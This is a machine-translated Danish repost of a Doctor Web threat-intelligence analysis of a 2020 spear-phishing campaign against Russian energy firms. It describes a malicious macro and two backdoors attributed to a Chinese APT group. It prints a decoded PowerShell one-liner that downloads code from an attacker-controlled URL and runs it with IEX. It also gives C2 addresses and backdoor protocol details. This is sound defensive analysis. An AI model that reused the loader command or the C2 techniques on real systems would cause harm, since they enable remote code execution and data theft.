ProHoster > Blog > administration > Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Vores erfaring med at undersøge computersikkerhedshændelser viser, at e-mail stadig er en af ​​de mest almindelige kanaler, der bruges af angribere til indledende indtrængen i angrebet netværksinfrastruktur. En skødesløs handling med et mistænkeligt (eller ikke så mistænkeligt) brev bliver et indgangspunkt for yderligere infektion, så cyberkriminelle bruger aktivt social engineering metoder, omend med varierende succes.

I dette indlæg vil vi gerne dele vores seneste undersøgelse af en spamkampagne rettet mod en række virksomheder i den russiske brændstof- og energisektor. Alle angreb fulgte det samme scenarie ved at bruge falske e-mails, selvom det lader til, at ingen har lagt meget indsats i tekstindholdet i disse e-mails.

udforskning

Det hele startede i slutningen af ​​april 2020, da Doctor Web-virusanalytikere registrerede en spamkampagne, hvor hackere sendte en opdateret telefonbog til ansatte i en række russiske brændstof- og energiselskaber. Naturligvis var dette ikke en simpel manifestation af bekymring, eftersom opslagsbogen ikke var ægte, og .docx-dokumenterne indlæste to billeder fra eksterne ressourcer.

En af dem blev downloadet til brugerens computer fra serveren news[.]zannews[.]com. Det er bemærkelsesværdigt, at domænenavnet ligner domænet for anti-korruptionsmediecentret i Kasakhstan - zannews[.]kz. På den anden side mindede det anvendte domæne os straks om en anden 2015-kampagne kendt som TOPNEWS, som brugte ICEFOG-bagdøren, og de trojanske kontroldomæner havde understrengen "nyheder" i deres navne. En anden interessant funktion var, at når der blev sendt e-mails til forskellige modtagere, blev der brugt enten forskellige forespørgselsparametre eller unikke billednavne i anmodninger om download af billeder.

Vi mener, at dette er sket med det formål at indsamle oplysninger for at finde frem til en "pålidelig" modtager, som efterfølgende med garanti ville åbne brevet på det rigtige tidspunkt. SMB-protokollen blev brugt til at downloade billedet fra den anden server, hvilket kunne have været gjort for at indsamle NetNTLM-hashes fra computere på medarbejdere, der åbnede det modtagne dokument.

Og her er selve brevet med den falske mappe:

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

I juni i år begyndte hackere at bruge et nyt domænenavn til at uploade billeder: sports[.]manhajnews[.]com. Analyse viste, at manhajnews[.]com-underdomæner er blevet brugt i spam-mails siden mindst september 2019. Et af målene for denne kampagne var et stort russisk universitet.

Også i juni var angrebsarrangørerne kommet med en ny tekst til deres breve: denne gang indeholdt dokumentet information om industriens udvikling. Brevets tekst indikerede klart, at dets forfatter enten ikke var russisk som modersmål eller bevidst skabte dette indtryk. Desværre viste ideerne til brancheudvikling sig som altid kun at være et cover - dokumentet downloadede igen to billeder, mens serveren blev ændret til download[.]inklingpaper[.]com.

Den næste innovation fulgte i juli. I et forsøg på at omgå opdagelse af ondsindede dokumenter ved hjælp af antivirusprogrammer, begyndte angribere at bruge Microsoft Word-dokumenter krypteret med en adgangskode. Samtidig besluttede angriberne sig for at bruge en klassisk social engineering-teknik: en belønningsmeddelelse.

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Appellens tekst blev igen skrevet i samme stil, hvilket vakte yderligere mistanke hos adressaten. Serveren til at downloade billedet ændrede sig heller ikke.

Det skal bemærkes, at i alle tilfælde blev e-mail-konti registreret på mail[.]ru og yandex[.]ru-domænerne brugt til at sende brevene.

Angreb

I begyndelsen af ​​september 2020 var det tid til aktiv handling. Vores virusanalytikere har registreret en ny bølge af angreb, hvor angriberne igen sendte e-mails ud under påskud af at opdatere telefonbogen. Denne gang indeholdt den vedhæftede fil dog en ondsindet makro.

Når du åbnede det vedhæftede dokument, oprettede makroen to filer:

  • VBS-script %APPDATA%microsoftwindowsstartmenuprogramsstartupadoba.vbs, som var beregnet til at starte batchfilen;
  • selve batchfilen %APPDATA%configstest.bat, som var sløret.

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Essensen af ​​dets arbejde kommer ned til at lancere Powershell-skallen med visse parametre. De parametre, der sendes til skallen, afkodes til kommandoer:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Som det kan ses af de angivne kommandoer, er domænet, hvorfra nyttelasten downloades, igen forklædt som et nyhedssite. En simpel malware leveres til den inficerede computer læsser, hvis eneste opgave er at modtage shellcode fra kontrolserveren og udføre den. Vi var i stand til at identificere to typer bagdøre, der kunne installeres på et offers pc.

Bagdør.Siggen2.3238

Den første er Bagdør.Siggen2.3238 — vores specialister har ikke stødt på dette program før, og der blev heller ikke fundet nogen omtaler af dette program fra andre antivirus-leverandører.

Dette program er en bagdør skrevet i C++ og kører på 32-bit Windows OS.

Bagdør.Siggen2.3238 er i stand til at opretholde kommunikationen med kontrolserveren via to protokoller: HTTP og HTTPS. Den undersøgte prøve bruger HTTPS-protokollen. Følgende User-Agent bruges i anmodninger til serveren:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

I dette tilfælde leveres alle anmodninger med følgende sæt parametre:

%s;type=%s;length=%s;realdata=%send

hvor hver %s linje er erstattet af:

  • inficeret computer-id,
  • typen af ​​anmodning, der sendes,
  • længden af ​​dataene i realdatafeltet,
  • data.

På tidspunktet for indsamling af oplysninger om det inficerede system genererer bagdøren en streng af følgende type:

lan=%s;cmpname=%s;username=%s;version=%s;

hvor lan er IP-adressen på den inficerede computer, cmpname er computernavnet, brugernavn er brugernavnet, version er strengen 0.0.4.03.

Disse oplysninger med sysinfo-id'et sendes via en POST-anmodning til kontrolserveren, der er placeret på https[:]//31.214[.]157.14/log.txt. Hvis som svar Bagdør.Siggen2.3238 modtager et HJERTE-signal, betragtes forbindelsen som vellykket, og bagdøren begynder hovedkommunikationscyklussen med serveren.

En mere fuldstændig beskrivelse af driftsprincipperne Bagdør.Siggen2.3238 er i vores virus bibliotek.

Bagdør.Hvidfugl.23

Det andet program er en ændring af BackDoor.Whitebird-bagdøren, som vi allerede kender fra hændelsen med det kasakhiske regeringsagentur. Denne version er skrevet i C++ og er designet til at køre på både 32-bit og 64-bit Windows-operativsystemer.

Ligesom de fleste programmer af denne type, Bagdør.Hvidfugl.23 er designet til at etablere en krypteret forbindelse med kontrolserveren og til at tage uautoriseret kontrol over den inficerede computer. Det er installeret i et kompromitteret system ved hjælp af en dråber. Bagdør.Siggen2.3244.

Prøven, vi undersøgte, var et ondsindet bibliotek med to eksporter:

  • GooglePlay,
  • Test.

I begyndelsen af ​​sit arbejde dekrypterer den konfigurationen syet ind i bagdøren ved hjælp af en algoritme baseret på XOR-operationen med byten 0x99. Konfigurationen ser således ud:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
};

For at sikre dens konstante drift ændrer bagdøren den værdi, der er angivet i feltet arbejdstimer konfigurationer. Feltet indeholder 1440 bytes, som tager værdierne 0 eller 1 og repræsenterer hvert minut af hver time på dagen. Opretter en separat tråd for hver netværksgrænseflade, der lytter på grænsefladen og leder efter autorisationspakker på proxyserveren fra den inficerede computer. Når en sådan pakke detekteres, tilføjer bagdøren information om proxyserveren til sin liste. Kontrollerer også for proxy-tilstedeværelse via WinAPI InternetQueryOptionW.

Programmet kontrollerer det aktuelle minut og time og sammenligner dem med dataene i feltet arbejdstimer konfigurationer. Hvis værdien for det tilsvarende minut på dagen ikke er nul, etableres en forbindelse med kontrolserveren.

Etablering af en forbindelse til serveren simulerer oprettelsen af ​​en forbindelse ved hjælp af TLS version 1.0-protokollen mellem klienten og serveren. Bagdørens krop indeholder to buffere.

Den første buffer indeholder en TLS 1.0 Client Hello-pakke.

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Den anden buffer indeholder TLS 1.0 Client Key Exchange-pakker med en nøglelængde på 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.

Vi efterforsker et målrettet spionangreb på det russiske brændstof- og energikompleks

Når du sender en Client Hello-pakke, skriver bagdøren 4 bytes af den aktuelle tid og 28 bytes pseudo-tilfældige data i feltet Client Random, beregnet som følger:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

Den modtagne pakke sendes til kontrolserveren. Svaret (Server Hello-pakke) kontrollerer:

  • Overholdelse af TLS-protokol version 1.0;
  • tidsstemplet (første 4 bytes af feltet Random Data-pakke) specificeret af klienten matcher tidsstemplet specificeret af serveren;
  • match af de første 4 bytes efter tidsstemplet i feltet Random Data på klienten og serveren.

Hvis der er nogen matcher, forbereder bagdøren en Client Key Exchange-pakke. For at gøre dette ændrer den den offentlige nøgle i klientnøgleudvekslingspakken såvel som krypterings IV og krypteringsdata i den krypterede håndtryksmeddelelsespakke.

Bagdøren modtager derefter en pakke fra C&C-serveren, kontrollerer, at TLS-protokolversionen er 1.0, og modtager derefter yderligere 54 bytes (pakkekroppen). Dette afslutter forbindelsesopsætningen.

En mere fuldstændig beskrivelse af driftsprincipperne Bagdør.Hvidfugl.23 er i vores virus bibliotek.

Konklusion og konklusioner

Analyse af dokumenter, malware og den anvendte infrastruktur giver os mulighed for med sikkerhed at sige, at angrebet blev forberedt af en af ​​de kinesiske APT-grupper. I betragtning af funktionaliteten af ​​de bagdøre, der installeres på ofrenes computere i tilfælde af et vellykket angreb, fører infektionen som minimum til tyveri af fortrolig information fra de angrebne organisationers computere.

Derudover er et meget sandsynligt scenario installation af specialiserede trojanske heste på lokale servere med en særlig funktion. Det kunne være domænecontrollere, mailservere, internetgateways osv. Som vi kunne se i eksemplet hændelse i Kasakhstan, er sådanne servere af særlig interesse for angribere af forskellige årsager.

Kilde: www.habr.com